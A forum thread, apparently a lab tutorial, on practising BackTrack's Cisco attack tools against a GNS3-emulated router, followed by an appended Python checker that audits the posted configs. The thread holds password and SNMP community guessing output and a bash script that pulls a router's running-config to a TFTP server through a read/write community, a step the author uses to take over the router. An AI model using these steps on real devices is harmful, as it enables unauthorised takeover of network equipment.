
Thread: Backtrack 4 cisco tool practice

  1. #1
    Senior Member iproute (Join Date: Jan 2010, Location: Midwest, USA, Posts: 192)

    Backtrack 4 cisco tool practice using GNS3

    There are a few simple cisco tools included with backtrack that can be handy for your audits. The purpose of this HOWTO is to demonstrate how these tools can be practiced with (maybe even customized for a given audit and tested) without needing any actual cisco gear on hand.

    First, we'll install GNS3, which is a handy cisco IOS emulator (think VMWare for cisco routers) and allows you to build a topology very easily.

    Code:
    root@bt:~# apt-get install gns3
    and you'll also want bridge-utils and uml-utilities. I know bridge-utils is already included with backtrack 4r1, so we'll just add the uml-utilities.
    Code:
    root@bt:~# apt-get install uml-utilities
    Now we need to set up our networking so that our VM router can speak to our LAN.
    Code:
    root@bt:~# tunctl
    Set 'tap0' persistent and owned by uid 0
    root@bt:~# brctl addbr br0
    root@bt:~# ifconfig eth0 down
    root@bt:~# ifconfig eth0 0.0.0.0 promisc up
    root@bt:~# ifconfig tap0 0.0.0.0 promisc up
    root@bt:~# brctl addif br0 eth0
    root@bt:~# brctl addif br0 tap0
    root@bt:~# dhclient br0
    Now we open gns3. It can be found in the menu under utilities, or from a terminal:
    Code:
    root@bt:~# gns3 &
    You'll need to add a cisco IOS image to use. They aren't that difficult to get your hands on. I recommend using something at least version 12.4.
    I was able to procure mine without too much difficulty through my work.
    I'll leave obtaining one up to you. For more information on using GNS3 go to
    GNS3 | Graphical Network Simulator
    If some of you are more comfortable in windows, GNS3 is available for that as well. Great tool for studying for cisco certifications.
    Anyway, with windows you can do the same thing as far as putting a virtual cisco router on your lan, then attacking it with your backtrack VM. This howto is from the perspective of a backtrack HD install or live-dvd run.

    I have a short video of setting up things in GNS3 up to opening a console to the router. It is fairly straight forward. I'll also include a sample of my cisco config I used to run a quick test with the cisco auditing tool included in backtrack.


    Here is my demo video of setting up GNS
    GNS3 Backtrack testing
    Here is my sample router config I used to test the cisco auditing tool.
    Code:
    !
    version 12.4
    service timestamps debug datetime msec
    service timestamps log datetime msec
    service password-encryption
    !
    hostname Router
    !
    boot-start-marker
    boot-end-marker
    !
    enable secret 5 $1$7bje$QqifV/x2cw1y16WdwL.Cd0
    !
    no aaa new-model
    memory-size iomem 5
    ip cef
    !
    !
    !
    !
    !
    !
    !
    interface FastEthernet0/0
     ip address dhcp
     duplex auto
     speed auto
    !
    interface FastEthernet0/1
     no ip address
     shutdown
     duplex auto
     speed auto
    !
    interface FastEthernet1/0
     no ip address
     shutdown
     duplex auto
     speed auto
    !
    ip forward-protocol nd
    !
    ip http server
    !
    snmp-server community public RO
    snmp-server community private RO
    !
    !
    !
    control-plane
    !
    !
    !
    gatekeeper
     shutdown
    !
    !
    line con 0
    line aux 0
    line vty 0 4
     password 7 045802150C2E
     login
    !
    !
    end
    Here is a video of me using the cisco auditing tool included with backtrack against my 3745 virtual router.
    Cisco Auditing Tool
    And here is the text howto of running the cisco audit tool
    Code:
    root@bt:/pentest/cisco/cisco-auditing-tool# ./CAT -h 192.168.25.136
    
    Cisco Auditing Tool - g0ne [null0]
    
    Checking Host: 192.168.25.136
    
    
    Guessing passwords:
    
    Password Found: cisco
    Invalid Password: ciscos
    Invalid Password: cisco1
    Invalid Password: router
    Invalid Password: router1
    Invalid Password: admin
    Invalid Password: Admin
    
    
    Guessing Community Names:
    
    Community Name Found: public
    Community Name Found: private
    
    ---------------------------------------------------
    
    Audit Complete
    I will continue to work on getting the other cisco tools in here such as the copy router config, and merge router config, but it may be a bit of time.
    Last edited by iproute; 11-24-2010 at 10:48 PM.

  2. #2
    Senior Member iproute (Join Date: Jan 2010, Location: Midwest, USA, Posts: 192)

    Re: Backtrack 4 cisco tool practice

    Here is a short script I wrote to grab a cisco config from a device as long as you know the read/write SNMP community string. For reasons unclear to me I could not get .copy-router-config.pl to work. FYI, my scripting-fu is not strong as of yet, but I can do simple things. Always open to suggestions....

    Code:
    #!/bin/bash
    # Copies a Cisco running-config to a TFTP server through the
    # CISCO-CONFIG-COPY-MIB ccCopyTable (row index 111). Needs a read/write community.
    
    echo "Please enter router IP:"
    read -r device
    echo "Please enter TFTP server IP:"
    read -r tftp
    echo "Please enter SNMP community read/write string:"
    read -r community
    echo "Please enter the local filename:"
    read -r filename
    
    OID="1.3.6.1.4.1.9.9.96.1.1.1.1"   # ccCopyEntry
    ROW=111                            # arbitrary row index used for this request
    
    # Destroy any leftover row so the request starts from a clean state
    snmpset -c "$community" -v 1 "$device" "$OID.14.$ROW" i 6
    
    # ccCopyProtocol = tftp(1)
    snmpset -c "$community" -v 1 "$device" "$OID.2.$ROW" i 1
    
    # ccCopySourceFileType = runningConfig(4)
    snmpset -c "$community" -v 1 "$device" "$OID.3.$ROW" i 4
    
    # ccCopyDestFileType = networkFile(1)
    snmpset -c "$community" -v 1 "$device" "$OID.4.$ROW" i 1
    
    # ccCopyServerAddress = IP address of the TFTP server
    snmpset -c "$community" -v 1 "$device" "$OID.5.$ROW" a "$tftp"
    
    # ccCopyFileName = the desired file name on the TFTP server
    snmpset -c "$community" -v 1 "$device" "$OID.6.$ROW" s "$filename"
    
    # ccCopyEntryRowStatus = active(1), which starts the copy
    snmpset -c "$community" -v 1 "$device" "$OID.14.$ROW" i 1
    
    # Destroy the row again once the copy has been kicked off
    snmpset -c "$community" -v 1 "$device" "$OID.14.$ROW" i 6
    Copy the code into kate, then chmod +x the file you saved. Not sure I can help too much if this script doesn't work, but I will make an effort.

    Here is the config I was using with the router before 'exploiting' it.
    Code:
    !
    version 12.4
    service timestamps debug datetime msec
    service timestamps log datetime msec
    service password-encryption
    !
    hostname Router
    !
    boot-start-marker
    boot-end-marker
    !
    enable password notcisco
    !
    no aaa new-model
    memory-size iomem 5
    ip cef
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    interface FastEthernet0/0
     ip address dhcp
     duplex auto
     speed auto
    !
    interface FastEthernet0/1
     no ip address
     shutdown
     duplex auto
     speed auto
    !
    interface FastEthernet1/0
     no ip address
     shutdown
     duplex auto
     speed auto
    !
    ip forward-protocol nd
    !
    ip http server
    !
    snmp-server community public RO
    snmp-server community private RW
    !
    !
    !
    control-plane
    !
    !
    !
    !
    !
    !
    !
    !
    gatekeeper
     shutdown
    !
    !
    line con 0
    line aux 0
    line vty 0 4
     password notcisco
     login
    !
    !
    end
    I did make some changes to the router config to simplify things for this demo.
    Here is a short vid of using the audit tool, with which we 'discover' that an SNMP community string called private exists, which we find also has read/write access. I use my script to copy the config, edit the config as needed to grant us access, then merge it back to the router with Muts' merge-router-config.pl script.
    Here is the vid

    I seriously hope no one ever finds an SNMP config anywhere in production configured like this, but I feel it effectively demonstrates gns3 can be used to develop or modify tools for cisco platforms, without needing any gear around.

    EDIT: I'm still working to add info and improve the quality of this howto, but bear in mind, my time is divided terribly right now.
    Last edited by iproute; 11-19-2010 at 04:31 PM.
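The two configs posted in this thread show the same weaknesses the audit tool trips over: default community strings, a read/write community that makes the config-copy trick above possible, a reversible enable password, an open HTTP server, and vty lines with reversible passwords and no access-class. The following static checker is an added example for readers of the thread; it is not the thread author's code and not part of cisco-auditing-tool. It embeds trimmed excerpts of the two posted configs (constructed from the lines above), parses the global-line / indented-child shape of a show running-config listing, and reports what a reviewer would want fixed before such a box reaches production.

```python
"""Static audit of the weak settings visible in the thread's two IOS configs.

Added example; not from the thread or cisco-auditing-tool. The parser is a
simplification: it only understands global lines and their indented children.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed excerpts of the configs posted in the thread (unrelated sections trimmed).
CONFIG_POST1 = """\
!
version 12.4
service password-encryption
hostname Router
enable secret 5 $1$7bje$QqifV/x2cw1y16WdwL.Cd0
interface FastEthernet0/0
 ip address dhcp
ip http server
snmp-server community public RO
snmp-server community private RO
line con 0
line vty 0 4
 password 7 045802150C2E
 login
end
"""

CONFIG_POST2 = """\
!
version 12.4
service password-encryption
hostname Router
enable password notcisco
interface FastEthernet0/0
 ip address dhcp
ip http server
snmp-server community public RO
snmp-server community private RW
line con 0
line vty 0 4
 password notcisco
 login
end
"""

DEFAULT_COMMUNITIES = {"public", "private"}


@dataclass(frozen=True)
class Finding:
    severity: str   # critical / high / medium
    line: str       # the config line the finding is about
    message: str


def parse_config(text):
    """Split a running-config listing into global lines and their indented children."""
    global_lines, children, current = [], {}, None
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue                      # separators carry no configuration
        if raw.startswith(" ") and current is not None:
            children[current].append(raw.strip())
        else:
            current = raw.strip()
            global_lines.append(current)
            children[current] = []
    return global_lines, children


def audit_config(text):
    """Return Findings for the weaknesses the thread's audit tool exploits."""
    global_lines, children = parse_config(text)
    findings, has_enable_secret = [], False
    for line in global_lines:
        snmp = re.match(r"snmp-server community (\S+)(?: (RO|RW))?(?: (\S+))?$", line)
        if snmp:
            community, access, acl = snmp.group(1), snmp.group(2) or "RO", snmp.group(3)
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append(Finding("high", line, f"default community string '{community}'"))
            if access == "RW":
                findings.append(Finding("critical", line,
                                        "read/write community: permits config copy via CISCO-CONFIG-COPY-MIB"))
            if acl is None:
                findings.append(Finding("medium", line, "community not bound to an access-list"))
        elif line.startswith("enable secret "):
            has_enable_secret = True
        elif line.startswith("enable password "):
            findings.append(Finding("high", line, "enable password is reversible; use 'enable secret'"))
        elif line == "ip http server":
            findings.append(Finding("medium", line, "HTTP management server enabled"))
        elif line.startswith("line vty "):
            sub = children[line]
            if not any(s.startswith("access-class ") for s in sub):
                findings.append(Finding("medium", line, "vty accepts logins from any source (no access-class)"))
            if not any(s.startswith("transport input ssh") for s in sub):
                findings.append(Finding("medium", line, "vty transport not restricted to ssh"))
            for s in sub:
                pw = re.match(r"password(?: (\d))? (\S+)$", s)
                if pw and pw.group(1) in (None, "0", "7"):
                    kind = "type 7 (reversible)" if pw.group(1) == "7" else "plaintext"
                    findings.append(Finding("high", line, f"vty password stored as {kind}"))
    if not has_enable_secret:
        findings.append(Finding("high", "(global)", "no 'enable secret' configured"))
    return findings


def summarize(findings):
    """Count findings per severity, e.g. {'critical': 1, 'high': 5, 'medium': 5}."""
    return dict(Counter(f.severity for f in findings))


if __name__ == "__main__":
    for name, cfg in (("post #1 config", CONFIG_POST1), ("post #2 config", CONFIG_POST2)):
        results = audit_config(cfg)
        print(f"== {name}: {summarize(results)}")
        for f in results:
            print(f"  [{f.severity:8}] {f.line}: {f.message}")
```

Run against the second config the checker's only critical finding is the `private RW` community, which is exactly the setting the config-copy script above depends on; binding the community to an access-list, dropping the default names, and replacing the type 7 and plaintext passwords with `enable secret` and SSH-only vty access would clear every finding listed.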
